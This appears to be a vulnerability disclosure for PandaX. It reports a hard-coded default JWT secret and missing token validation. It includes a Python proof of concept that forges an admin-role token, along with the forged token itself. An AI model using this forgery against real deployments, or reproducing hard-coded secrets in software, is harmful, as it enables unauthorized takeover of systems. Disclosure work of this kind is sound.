[Vulnerability] PandaX JWT_SECRET HardCoded

[H2u8s]

版本信息（Version）

before commit fb8ff40 (As of December 10, 2025)

问题描述（Describe）

PandaX uses a hard-coded JWT authentication key, and the authentication field logic in the authentication mechanism is insecure, allowing attackers to easily forge super administrator credentials and take over the entire system.

截图或日志（Log）

https://github.com/PandaXGO/PandaX/blob/master/config.yml#L27C8-L27C14

According to the official deployment, the default key is PandaX here.

如何复现（To Reproduce）

Regarding the default JWT key, once the system is deployed, the JWT encryption key will be PandaX . This can be verified using online resources.

Meanwhile, through black-box testing, we discovered that the system did not perform any validity checks on the incoming JWT, or even check the validity period. It considered the incoming RoleKey to be valid, making the attack very simple.

import jwt
import json

def generate_jwt():
    secret = "PandaX"  
    payload = {
        "RoleKey": "admin",
    }
    token = jwt.encode(payload, secret, algorithm="HS256")
    return token

if __name__ == "__main__":
    token = generate_jwt()
    print("JWT：")
    print(token)

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJSb2xlS2V5IjoiYWRtaW4ifQ.xuhLi3o2P7fDdHG5CPHbzMuBlGYattCQHFmBnT-ltwY

Obtain our fake super administrator credentials

The fact that our forged credentials passed the server's verification indicates that we have obtained super administrator privileges and have directly taken over the entire system, rendering the system's authentication highly insecure.